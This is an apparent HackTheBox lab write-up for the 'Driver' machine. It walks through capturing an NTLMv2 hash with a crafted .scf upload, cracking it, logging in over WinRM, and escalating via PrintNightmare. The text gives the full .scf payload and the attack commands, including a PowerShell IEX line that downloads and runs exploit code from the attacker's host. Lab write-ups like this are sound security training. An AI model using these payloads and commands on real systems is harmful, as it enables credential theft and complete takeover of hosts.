Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Driver (HTB – Easy)

This machine exposes an IIS web application and SMB/WinRM services. Initial access is obtained by abusing a file upload feature to capture an NTLMv2 hash via a crafted .scf file. The captured hash is cracked to obtain valid credentials for WinRM. Privilege escalation is performed using the PrintNightmare (CVE‑2021‑1675) exploit to create a new local administrator.

Overview

Target: 10.129.95.238
Main vector: NTLM capture via .scf upload
Privilege escalation: PrintNightmare (CVE‑2021‑1675)

Enumeration

Nmap:

80/tcp   http (IIS 10.0)
135/tcp  msrpc
445/tcp  smb
5985/tcp winrm

SMB checks:

$ crackmapexec smb 10.129.95.238
$ smbclient -L 10.129.95.238 -N
$ smbmap -H 10.129.95.238 -u 'null'

The web application (MFP Firmware Update Center) allows file uploads. A Shell Command File (.scf) can be used to trigger an outbound SMB connection and capture NTLMv2.

NTLM Capture via .scf Upload

Start SMB listener on attacker:

$ impacket-smbserver smbFolder $(pwd) -smb2support

Create pentestlab.scf:

[Shell]
Command=2
IconFile=\\KALI_IP\smbFolder\pentestlab.ico

[Taskbar]
Command=ToggleDesktop

Upload the .scf file through the web interface. When the server processes the icon path, it connects back to the attacker SMB share and leaks an NTLMv2 hash for user tony.

Crack the hash:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
-> tony : liltony

Foothold

Validate credentials:

$ crackmapexec smb 10.129.95.238 -u 'tony' -p 'liltony'
$ crackmapexec winrm 10.129.95.238 -u 'tony' -p 'liltony'
-> [Pwn3d!] (tony is in Remote Management Users)

WinRM shell:

$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony'

User access is obtained and user.txt can be read.

Privilege Escalation (PrintNightmare)

Privilege enumeration (e.g. with winPEAS) reveals a vulnerable print spooler configuration. PrintNightmare (CVE‑2021‑1675) can be used for local privilege escalation.

Get the exploit (PowerShell implementation, e.g. Invoke-Nightmare):

# On attacker
$ wget https://github.com/calebstewart/CVE-2021-1675 -O CVE-2021-1675.ps1
$ python3 -m http.server 80

On the victim (from the WinRM session):

PS> IEX (New-Object Net.WebClient).DownloadString('http://KALI_IP/CVE-2021-1675.ps1')
PS> Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"

This creates a new local user john with administrative privileges.

Connect as the new admin:

$ evil-winrm -i 10.129.95.238 -u 'john' -p 'SuperSecure'
-> root.txt

Conclusion

The machine combines NTLM relay-style credential capture via a malicious .scf upload with a classic Windows local privilege escalation (PrintNightmare). After capturing and cracking Tony’s NTLMv2 hash, WinRM access is obtained, and the print spooler vulnerability is abused to create a new local administrator and fully compromise the host.